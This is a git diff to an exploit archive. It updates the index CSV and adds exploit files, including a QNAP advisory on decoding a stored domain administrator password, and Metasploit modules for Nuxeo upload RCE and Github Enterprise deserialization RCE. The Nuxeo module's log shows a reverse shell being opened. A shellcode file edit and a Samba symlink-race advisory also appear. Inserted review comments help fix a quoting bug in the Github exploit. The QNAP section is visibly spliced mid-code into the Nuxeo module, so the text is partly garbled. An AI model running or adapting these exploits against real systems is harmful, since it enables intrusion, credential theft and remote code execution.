diff --git a/files.csv b/files.csv
index 85b240f5b..88591ad97 100644
--- a/files.csv
+++ b/files.csv
@@ -4513,7 +4513,7 @@ id,file,description,date,author,platform,type,port
 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
 36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
 36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0
-36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,lin_x86,dos,0
+36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Service (PoC)",2015-04-13,sleepya,lin_x86,dos,0
 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0
 36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
 36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
@@ -5425,6 +5425,11 @@ id,file,description,date,author,platform,type,port
 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
+41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
+41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
+41741,platforms/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",multiple,dos,0
+41742,platforms/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",multiple,dos,0
+41743,platforms/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8887,6 +8892,7 @@ id,file,description,date,author,platform,type,port
 41713,platforms/windows/local/41713.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-10-20,Metasploit,windows,local,0
 41721,platforms/windows/local/41721.c,"Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
 41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
+41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15390,6 +15396,9 @@ id,file,description,date,author,platform,type,port
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
 41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
+41738,platforms/windows/remote/41738.py,"Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
+41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
+41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
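Review bot: The new 41738 row records port 0 for an IIS 6.0 WebDAV remote exploit, while the existing IIS WebDAV rows for 1.c and 2.c in the hunk at -8887 carry 80 in the same column. If the last column is meant to hold the targeted service port, as those sibling rows and the 41744 row's 8443 suggest, this entry should probably end `...,"Zhiniang Peng and Chen Wu",windows,remote,80`. The 41740 Samba row likewise carries 0; its advisory text does not state a port, so that one may be intentional.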
@@ -37261,7 +37270,7 @@ id,file,description,date,author,platform,type,port
 41137,platforms/php/webapps/41137.txt,"Music Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
 41138,platforms/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
 41139,platforms/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
-41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
+41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
 41141,platforms/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps,0
 41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0
 41147,platforms/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",hardware,webapps,0
@@ -37630,3 +37639,19 @@ id,file,description,date,author,platform,type,port
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
+41724,platforms/php/webapps/41724.txt,"Just Another Video Script 1.4.3 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41725,platforms/php/webapps/41725.txt,"Adult Tube Video Script - SQL Injection",2017-03-25,"Ihsan Sencan",php,webapps,0
+41726,platforms/php/webapps/41726.txt,"Alibaba Clone Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41727,platforms/php/webapps/41727.txt,"B2B Marketplace Script 2.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41728,platforms/php/webapps/41728.txt,"Php Real Estate Property Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41729,platforms/php/webapps/41729.txt,"Courier Tracking Software 6.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41730,platforms/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41731,platforms/php/webapps/41731.txt,"Delux Same Day Delivery Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41732,platforms/php/webapps/41732.txt,"Hotel Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41733,platforms/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41735,platforms/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0
+41736,platforms/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0
+41746,platforms/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,php,webapps,0
+41747,platforms/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,php,webapps,0
+41748,platforms/jsp/webapps/41748.rb,"Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,jsp,webapps,0
+41749,platforms/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",php,webapps,0
diff --git a/platforms/hardware/local/41745.txt b/platforms/hardware/local/41745.txt
new file mode 100755
index 000000000..3afb67238
--- /dev/null
+++ b/platforms/hardware/local/41745.txt
@@ -0,0 +1,215 @@ +QNAP QTS Domain Privilege Escalation Vulnerability + + Name Sensitive Data Exposure in QNAP QTS + Systems Affected QNAP QTS (NAS) all model and all versions < 4.2.4 + Severity High 7.9/10 + Impact CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L + Vendor http://www.qnap.com/ + Advisory http://www.ush.it/team/ush/hack-qnap/qnap.txt + Authors Pasquale "sid" Fiorillo (sid AT ush DOT it) + Guido "go" Oricchio (g.oricchio AT pcego DOT com) + Date 20170322 + +I. BACKGROUND + +QNAP Systems, founded in 2004, provides network attached storage (NAS) +and network video recorder (NVR) solutions for home and business use to +the global market. +QNAP also delivers a cloud service, called myQNAPcloud, that allows +users to access and manage the devices from anywhere. +QTS is a QNAP devices proprietary firmware based on Linux. + +ISGroup (http://www.isgroup.biz/) is an Italian Information Security +boutique, we found this 0day issue while supporting Guido Oricchio +of PCego, a System Integrator, to secure a QNAP product for one of his +customer. + +Responsible disclosure with Qnap: we contacted qnap on public security@ +contact and we escalate fast to their Security Researcher Myron Su on +PGP emails. + +Prior vulnerabilities in QNAP: +https://www.qnap.com/en/support/con_show.php?op=showone&cid=41 + +Information to customers of the vulnerability is shown in their bulletin +ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113): +QTS 4.2.4 Build 20170313 includes security fixes for the following +vulnerabilities: Configuration file vulnerability (CVE-2017-5227) +reported by Pasquale Fiorillo of the cyber security company ISGroup +(www.isgroup.biz), a cyber security company, and Guido Oricchio of +PCego (www.pcego.com), a system integrator. + +The latest version of the software at the time of writing can be +obtained from: + +https://www.qnap.com/en-us/product_x_down/ +https://start.qnap.com/en/index.php +https://www.qnap.com/ + +II. 
DESCRIPTION + +The vulnerability allows a local QTS admin user, or other low privileged +user, to access configuration file that includes a bad crypted Microsoft +Domain Administrator password if the NAS was joined to a Microsoft +Active Directory domain. + +The affected component is the "uLinux.conf" configuration file, +created with a world-readable permission used to store a Domain +Administrator password. + +Admin user can access the file using ssh that is enabled by default. +Other users are not allowed to login, so they have to exploit a +component, such as a web application, to run arbitrary command or +arbitrary file read. + +TLDR: Anyone is able to read uLinux.conf file, world readable by +default, can escalate to Domain Administrator if a NAS is a domain +member. + +III. ANALYSIS + +QNAP QTS stores "uLinux.conf" configuration file in a directory +accessible by "nobody" and with permission that make them readable by +"nobody". + +If the NAS was joined to an Active Directory, such file contain a Domain +Administrator user and password in an easily decrypt format. + +In older versions of QTS the Domain Admin's password was stored in +plaintext. + +A) Config file readable by "nobody" + + [~] # ls -l /etc/config/uLinux.conf + -rw-r--r-- 1 admin administ 7312 Dec 10 06:39 /etc/config/uLinux.conf + + Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U, + TS-469L, and TS-221. Access to the needed file are guaranteed to + all the local users, such as httpdusr used to running web sites and + web application hosted on the NAS. + + This expose all the information contained in the configuration file at + risk and this is a violation of the principle of least privilege. + + https://en.wikipedia.org/wiki/Principle_of_least_privilege + +B) Weak encrypted password in the configuration file + + The Microsoft Active Directory Admin username and password are stored + in the file obfuscated by a simple XOR cypher and base64 encoded. 
+ + In this scenario, a Local File Read vulnerability could lead to full + domain compromise given the fact that an attacker can re-use such + credentials to authenticate against a Domain Controller with maximum + privileges. + + The password field in the uLinux.conf has the following format: + + User = + Password = + + eg: + User = Administrator + Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw== + + The "" decoded is: + + sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C + 00000000 03 03 00 00 01 01 06 06 07 07 04 04 23 23 20 20 |............## | + 00000010 21 21 26 26 27 27 24 24 43 |!!&&''$$C| + 00000019 + + Each byte xored with \x62 is the hex ascii code of the plaintext char. + Eg: + \x03 ^ \x62 = \x61 (a) + \x00 ^ \x62 = \x61 (b) + ... + \x24 ^ \x62 = \x46 (F) + \x43 ^ \x62 = \x21 (!) + + The plaintext password is: aabbccddeeffAABBCCDDEEFF! + +IV. EXPLOIT + +The following code can be used to decode the password: + +#!/usr/bin/php + "Nuxeo Platform File Upload RCE", + 'Description' => %q{ + The Nuxeo Platform tool is vulnerable to an authenticated remote code execution, + thanks to an upload module. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => ['Ronan Kervella '], + 'References' => + [ + ['https://nuxeo.com/', ''] + ], + 'Platform' => %w{linux}, + 'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ], + 'Arch' => ARCH_JAVA, + 'Privileged' => true, + 'Payload' => {}, + 'DisclosureDate' => "", + 'DefaultTarget' => 0)) + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']), + OptString.new('USERNAME', [true, 'A valid username', '']), + OptString.new('PASSWORD', [true, 'Password linked to the username', '']) + ], self.class) + end + + def jsp_filename + @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp' + end + + def jsp_path + 'nxserver/nuxeo.war/' + jsp_filename + end + + def nuxeo_login + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '/login.jsp') + ) + + fail_with(Failure::Unreachable, 'No response received from the target.') unless res + session_cookie = res.get_cookies + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'), + 'cookie' => session_cookie, + 'vars_post' => { + 'user_name' => datastore['USERNAME'], + 'user_password' => datastore['PASSWORD'], + 'submit' => 'Connexion' + } + ) + return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces') + nil + end + + def trigger_shell + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, jsp_filename) + ) + fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200 + end + + def exploit + print_status("Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + session_cookie = nuxeo_login + if session_cookie + payload_url = normalize_uri(target_uri.path, jsp_filename) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'), + 'cookie' => 
session_cookie, + 'headers' => { + 'X-File-Name' => '../../' + jsp_path, + 'X-Batch-Id' => '00', + 'X-File-Size' => '1024', + 'X-File-Type' => '', + 'X-File-Idx' => '0', + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'ctype' => '', + 'data' => payload.encoded + ) + fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200 + print_status("Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.") + trigger_shell + else + fail_with(Failure::Unknown, 'Unable to login') + end + end + +end + +=begin +Module output: + +```bash +msf> use exploit/multi/http/nuxeo +msf exploit(nuxeo) > set USERNAME user1 +USERNAME => user1 +msf exploit(nuxeo) > set PASSWORD password +PASSWORD => password +msf exploit(nuxeo) > set rhost 192.168.253.132 +rhost => 192.168.253.132 +msf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp +payload => java/jsp_shell_reverse_tcp +msf exploit(nuxeo) > set lhost 192.168.253.1 +lhost => 192.168.253.1 +msf exploit(nuxeo) > exploit + +[-] Handler failed to bind to 192.168.253.1:4444:- - +[*] Started reverse TCP handler on 0.0.0.0:4444 +[*] Authenticating using user1:password +[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp. +[*] Command shell session 1 opened (172.17.0.2:4444 -> +192.168.253.132:43279) at 2017-01-13 14:47:25 +0000 + +id +uid=1000(nuxeo) gid=1000(nuxeo) +groups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare) +pwd +/var/lib/nuxeo/server +``` + +# Vulnerable code + +The vulnerable code is located in the +`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github +link](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)), +where the header ``X-File-Name`` is not checked. 
+ +# Fix + +Nuxeo provided a +[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892) +for this issue. +A hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35). + +Please note that vulnerability does not affect Nuxeo versions above 7.3. + +# Affected versions + +* Nuxeo 6.0 (LTS 2014), released 2014-11-06 +* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15 +* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24 +* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24 + +# Unaffected versions + +* Nuxeo 6.0 HF35, released 2017-01-12 +* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02 +* Nuxeo 7.10 (LTS 2015), released 2015-11-09 +* Nuxeo 8.10 (LTS 2016), released 2016-12-06 + +# Credits + +Ronan Kervella + +-- SYSDREAM Labs +GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 +* Website: https://sysdream.com/ +* Twitter: @sysdream +=end \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/41723.c b/platforms/lin_x86/shellcode/41723.c index e04a4a220..21c3a957a 100755 --- a/platforms/lin_x86/shellcode/41723.c +++ b/platforms/lin_x86/shellcode/41723.c @@ -2,7 +2,6 @@ ; File name: reversebash.nasm ; Author: Jasmin Landry (@JR0ch17) ; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119 -; To change ; Shellcode length: 110 bytes ; Tested on Ubuntu 12.04.5 32-bit (x86) ; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g diff --git a/platforms/linux/remote/41744.rb b/platforms/linux/remote/41744.rb new file mode 100755 index 000000000..e2dd903ff --- /dev/null +++ b/platforms/linux/remote/41744.rb 
@@ -0,0 +1,195 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "Github Enterprise Default Session Secret And Deserialization Vulnerability", + 'Description' => %q{ + This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6. + The first is that the session management uses a hard-coded secret value, which can be + abused to sign a serialized malicious Ruby object. The second problem is due to the + use of unsafe deserialization, which allows the malicious Ruby object to be loaded, + and results in arbitrary remote code execution. + + This exploit was tested against version 2.8.0. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'iblue ', # Original discovery, writeup, and PoC (he did it all!) 
+ 'sinn3r' # Porting the PoC to Metasploit + ], + 'References' => + [ + [ 'EDB', '41616' ], + [ 'URL', 'http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html' ], + [ 'URL', 'https://enterprise.github.com/releases/2.8.7/notes' ] # Patched in this version + ], + 'Platform' => 'linux', + 'Targets' => + [ + [ 'Github Enterprise 2.8', { } ] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 8443 + }, + 'Privileged' => false, + 'DisclosureDate' => 'Mar 15 2017', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path for Github Enterprise', '/']) + ], self.class) + end + + def secret + '641dd6454584ddabfed6342cc66281fb' + end + + def check + uri = normalize_uri(target_uri.path, 'setup', 'unlock') + res = send_request_cgi!({ + 'method' => 'GET', + 'uri' => uri, + 'vars_get' =>{ + 'redirect_to' => '/' + } + }) + + unless res + vprint_error('Connection timed out.') + return Exploit::CheckCode::Unknown + end + + unless res.get_cookies.match(/^_gh_manage/) + vprint_error('No _gh_manage value in cookie found') + return Exploit::CheckCode::Safe + end + + cookies = res.get_cookies + vprint_status("Found cookie value: #{cookies}, checking to see if it can be tampered...") + gh_manage_value = CGI.unescape(cookies.scan(/_gh_manage=(.+)/).flatten.first) + data = gh_manage_value.split('--').first + hmac = gh_manage_value.split('--').last.split(';', 2).first + vprint_status("Data: #{data.gsub(/\n/, '')}") + vprint_status("Extracted HMAC: #{hmac}") + expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data) + vprint_status("Expected HMAC: #{expected_hmac}") + + if expected_hmac == hmac + vprint_status("The HMACs match, which means you can sign and tamper the cookie.") + return Exploit::CheckCode::Vulnerable + end + + Exploit::CheckCode::Safe + end + + def get_ruby_code + b64_fname = "/tmp/#{Rex::Text.rand_text_alpha(6)}.bin" + bin_fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}.bin" + 
register_file_for_cleanup(b64_fname, bin_fname) + p = Rex::Text.encode_base64(generate_payload_exe) + + c = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; " + c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); " + c << "%x(chmod +x #{bin_fname}); " + c << "%x(#{bin_fname})" + c + end + + + def serialize + # We don't want to run this code within the context of Framework, so we run it as an + # external process. + # Brilliant trick from Brent and Adam to overcome the issue. + ruby_code = %Q| + module Erubis;class Eruby;end;end + module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end + + erubis = Erubis::Eruby.allocate + erubis.instance_variable_set :@src, \\"#{get_ruby_code}; 1\\" + proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate + proxy.instance_variable_set :@instance, erubis + proxy.instance_variable_set :@method, :result + proxy.instance_variable_set :@var, "@result" + + session = + { + 'session_id' => '', + 'exploit' => proxy + } + + print Marshal.dump(session) + | + + serialized_output = `ruby -e "#{ruby_code}"` + + serialized_object = [serialized_output].pack('m') + hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, serialized_object) + + return serialized_object, hmac + end + + def send_serialized_data(dump, hmac) + uri = normalize_uri(target_uri.path) + gh_manage_value = CGI.escape("#{dump}--#{hmac}") + cookie = "_gh_manage=#{gh_manage_value}" + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie + }) + + if res + print_status("Server returned: #{res.code}") + end + end + + def exploit + dump, hmac = serialize + print_status('Serialized Ruby stager') + + print_status('Sending serialized Ruby stager...') + send_serialized_data(dump, hmac) + end + +end + +=begin + +Handy information: + +To deobfuscate Github code, use this script: +https://gist.github.com/wchen-r7/003bef511074b8bc8432e82bfbe0dd42 + +Github Enterprise's 
Rack::Session::Cookie saves the session data into a cookie using this +algorithm: + +* Takes the session hash (Json) in env['rack.session'] +* Marshal.dump the hash into a string +* Base64 the string +* Append a hash of the data at the end of the string to prevent tampering. +* The signed data is saved in _gh_manage' + +The format looks like this: + +[ DATA ]--[ Hash ] + +Also see: +https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb + +=end \ No newline at end of file diff --git a/platforms/multiple/dos/41741.html b/platforms/multiple/dos/41741.html new file mode 100755 index 000000000..dd9771a46 --- /dev/null +++ b/platforms/multiple/dos/41741.html @@ -0,0 +1,56 @@ + + + + + + + diff --git a/platforms/multiple/dos/41742.html b/platforms/multiple/dos/41742.html new file mode 100755 index 000000000..b76fa6056 --- /dev/null +++ b/platforms/multiple/dos/41742.html @@ -0,0 +1,55 @@ + + + + + + + diff --git a/platforms/multiple/dos/41743.html b/platforms/multiple/dos/41743.html new file mode 100755 index 000000000..9ef97b29f --- /dev/null +++ b/platforms/multiple/dos/41743.html @@ -0,0 +1,70 @@ + + + + + + + diff --git a/platforms/multiple/remote/41740.txt b/platforms/multiple/remote/41740.txt new file mode 100755 index 000000000..84f8b3f03 --- /dev/null +++ b/platforms/multiple/remote/41740.txt 
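Review bot: In `serialize` the `%Q|…|` template is handed to the shell as `ruby -e "#{ruby_code}"`, but the line `proxy.instance_variable_set :@var, "@result"` leaves its double quotes unescaped, so the shell closes and reopens its own quoting there and the child Ruby process receives `:@var, @result`, which evaluates to nil instead of the intended string; the template already escapes the other embedded quotes as `\\"`, so this line should do the same or use `'@result'`. Separately, `check` deserves a short doc comment: it only fetches the server-issued `_gh_manage` cookie from `/setup/unlock` and recomputes the HMAC locally with the default `secret`, never sending a modified cookie, which makes it a non-destructive probe an operator can use to confirm that the 2.8.7 fix referenced in the module is in place.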
@@ -0,0 +1,94 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039 + +The Samba server is supposed to only grant access to configured share +directories unless "wide links" are enabled, in which case the server is allowed +to follow symlinks. The default (since CVE-2010-0926) is that wide links are +disabled. + +smbd ensures that it isn't following symlinks by calling lstat() on every +path component, as can be seen in strace (in reaction to the request +"get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share): + +root@debian:/home/user# strace -e trace=file -p18954 +Process 18954 attached +lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 +getcwd("/public", 4096) = 8 +lstat("/public/a", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e/f", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e/f/g", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e/f/g/h", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e/f/g/h/i", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 +stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 +getxattr("a/b/c/d/e/f/g/h/i/j", "system.posix_acl_access", 0x7ffc8d870c30, 132) = -1 ENODATA (No data available) +stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 +open("a/b/c/d/e/f/g/h/i/j", O_RDONLY) = 35 + + +This is racy: Any of the path components - either one of the directories or the +file at the end - could be replaced with a symlink by an attacker over a second +connection to the same share. 
For example, replacing a/b/c/d/e/f/g/h/i +with a symlink to / immediately before the open() call would cause smbd to open +/j. + +To reproduce: + + - Set up a server with Samba 4.5.2. (I'm using Samba 4.5.2 from Debian + unstable. I'm running the attacks on a native machine while the server is + running in a VM on the same machine.) + - On the server, create a world-readable file "/secret" that contains some + text. The goal of the attacker is to leak the contents of that file. + - On the server, create a directory "/public", mode 0777. + - Create a share named "public", accessible for guests, writable, with path + "/public". + - As the attacker, patch a copy of the samba-4.5.2 sourcecode with the patch in + attack_commands.patch. + - Build the patched copy of samba-4.5.2. The built smbclient will be used in + the following steps. + - Prepare the server's directory layout remotely and start the rename side of + the race: + + $ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public + ./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it + 